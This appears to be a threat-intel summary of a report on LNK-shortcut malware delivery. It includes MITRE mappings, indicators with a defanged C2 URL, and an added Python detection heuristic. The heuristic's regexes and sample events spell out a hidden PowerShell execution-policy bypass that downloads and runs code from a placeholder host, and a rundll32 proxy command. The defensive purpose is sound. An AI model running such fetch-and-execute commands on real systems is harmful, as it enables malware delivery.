Shortcut-based (LNK) attacks delivering malicious code on the rise

Resecurity reports attackers are increasingly using tools to generate malicious shortcut files (.LNK) for payload delivery, with MLNK Builder 4.2 adding AV evasion and icon masquerading. Campaigns by APT groups and cybercriminals—including Bumblebee Loader and Armageddon (UAC-0010)—employ LNK-based multi-format payloads, ISO attachments, and LOLBins to bypass defenses across EU targets. #MLNKBuilder #LNK #BumblebeeLoader #Armageddon #Oakboat #Qbot #IcedID #Emotet #Qakbot #TA578 #TA570

Key points

  • MLNK Builder 4.2 emphasizes AV evasion and icon masquerading to disguise LNK-based payloads.
  • LNK files can masquerade as legitimate Word, PDF, ZIP, JPG/PNG, MP3 or AVI files and are packaged in ISO attachments to confuse protections.
  • PowerShell code embedded in LNK files is executed after user interaction, with attempts to bypass execution policies.
  • Campaigns (e.g., Bumblebee Loader, UAC-0010/Armageddon) target EU countries, using email and contact-form tactics to deliver ISO attachments.
  • The attacker toolkit allows payloads to download, decode (base64) and decrypt (AES) before execution, indicating multi-stage delivery.
  • Defenses are repeatedly bypassed (Windows Defender, SmartScreen, UAC, AMSI) and LOLBins are leveraged to enable stealthy execution.

MITRE Techniques

  • [T1023] Shortcut Modification – LNK-based payload delivery using shortcuts that masquerade and execute payloads. ‘The bad actors incorporate malicious code into LNK files (e.g. PowerShell scenario) allowing the execution of the payload on the target machine.’
  • [T1059.001] PowerShell – Embedded PowerShell in LNK that will be executed after the user clicks the LNK file. ‘PowerShell code was embedded inside the file which will be executed after the victim clicks on the LNK file.’
  • [T1140] Deobfuscate/Decode Files or Information – Payload decoding and decryption steps. ‘decode the payload by using the base64 decoder, then use AES decryption to decrypt the payload’
  • [T1105] Ingress Tool Transfer – Downloading payloads from external servers (C2). ‘Downloading the payload from “https://native-one[.]com:4200/client_auth”’
  • [T1218.011] Rundll32 – Executing DLLs via rundll32 as a proxy for payload run. ‘rundll32.exe scanned.dll,DllUnregisterServer’
  • [T1562.001] Impair Defenses – Bypass or weaken defenses (Windows Defender, SmartScreen, UAC). ‘The updated tool provides a rich arsenal of options… to evade Windows Defender, SmartScreen and UAC’
  • [T1036] Masquerading – Masquerading with icons from legitimate applications/formats to appear benign. ‘masquerading with icons from legitimately popular applications and file formats.’
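The techniques above translate into a few observable patterns on an endpoint: a shortcut whose name hides a .lnk behind a document-like extension, PowerShell spawned from the shell with an execution-policy bypass or a download cradle, and rundll32 invoking a DLL's DllUnregisterServer export. The following Python detection heuristic is an added example, not code from Resecurity's report or from the tool it describes. It assumes a simplified process-creation event (parent image, image, command line), treats explorer.exe as the parent of a user-clicked shortcut, and uses constructed sample events; the URL in the sample is a placeholder, not an indicator from the report.

```python
"""Heuristic checks for the LNK delivery patterns described in the report.

Added example; the Event shape and the explorer.exe-parent assumption are
simplifications, and all sample data below is constructed.
"""
import re
from dataclasses import dataclass

# Extensions the report says LNK files are disguised as (Word, PDF, ZIP, images, media).
DOC_LIKE = ("doc", "docx", "pdf", "zip", "jpg", "jpeg", "png", "mp3", "avi")

# -ExecutionPolicy Bypass / -ep unrestricted and similar execution-policy overrides.
POLICY_BYPASS = re.compile(r"-(?:ex|ep|executionpolicy)\s+(?:bypass|unrestricted)", re.I)
# -EncodedCommand followed by a long base64 blob.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)
# Common download cradles used to fetch a second stage from a remote server.
DOWNLOAD = re.compile(
    r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|DownloadString|DownloadFile|Net\.WebClient)\b",
    re.I,
)
# rundll32 used as a proxy to run a DLL's DllUnregisterServer export (as in the report).
RUNDLL_EXPORT = re.compile(r"rundll32(?:\.exe)?\s+\S+\.dll,\s*DllUnregisterServer\b", re.I)


@dataclass
class Event:
    """Minimal process-creation record (assumed shape, not a real sensor schema)."""
    parent: str   # parent process image name, e.g. explorer.exe
    image: str    # process image name, e.g. powershell.exe
    cmdline: str  # full command line


def is_masquerading_lnk(filename: str) -> bool:
    """True when a .lnk hides behind a document-like extension, e.g. Invoice.pdf.lnk."""
    parts = filename.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[2] == "lnk" and parts[1] in DOC_LIKE


def classify(ev: Event) -> list:
    """Return the names of the suspicious patterns matched by one event."""
    findings = []
    image = ev.image.lower()
    parent = ev.parent.lower()
    cl = ev.cmdline

    # PowerShell launched directly from the shell is consistent with a clicked shortcut.
    if image in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe":
        if POLICY_BYPASS.search(cl):
            findings.append("powershell_execution_policy_bypass")
        if ENCODED_CMD.search(cl):
            findings.append("powershell_encoded_command")
        if DOWNLOAD.search(cl):
            findings.append("powershell_download_cradle")

    if image == "rundll32.exe" and RUNDLL_EXPORT.search(cl):
        findings.append("rundll32_dllunregisterserver_proxy")

    return findings


def scan(events: list) -> dict:
    """Map event index -> findings for every event that triggered at least one check."""
    return {i: f for i, ev in enumerate(events) if (f := classify(ev))}


# Constructed sample events (not real telemetry). The URL is a placeholder.
SAMPLE_EVENTS = [
    Event("explorer.exe", "powershell.exe",
          'powershell.exe -ExecutionPolicy Bypass -w hidden -c '
          '"IEX (New-Object Net.WebClient).DownloadString(\'https://example.invalid/stage\')"'),
    Event("cmd.exe", "rundll32.exe", "rundll32.exe scanned.dll,DllUnregisterServer"),
    Event("explorer.exe", "powershell.exe", "powershell.exe -Command Get-Date"),
    Event("svchost.exe", "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].cmdline[:60], "->", found)
    for name in ("Invoice.pdf.lnk", "photo.jpg.lnk", "report.docx"):
        print(name, "masquerading:", is_masquerading_lnk(name))
```

The checks are deliberately narrow so that ordinary administrative PowerShell (the third sample event) and legitimate rundll32 use (the fourth) produce no findings; in practice the shortcut-name check is best applied at the mail gateway or on ISO/archive contents before the user ever sees the file, while the process checks belong in endpoint telemetry rules.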

Indicators of Compromise

  • [File Hashes] – fa15b97a6bb4d34e84dfb060b7114a5d, a4e45d28631ea2dd178f314f1362f213, and 2 more hashes
  • [File Names] – Datos-2504.lnk, namr.dll, and 2 more names
  • [Domains] – native-one[.]com, cert.gov.ua
  • [URLs] – https://cert.gov.ua/article/39086, https://native-one[.]com:4200/client_auth

Read more: https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise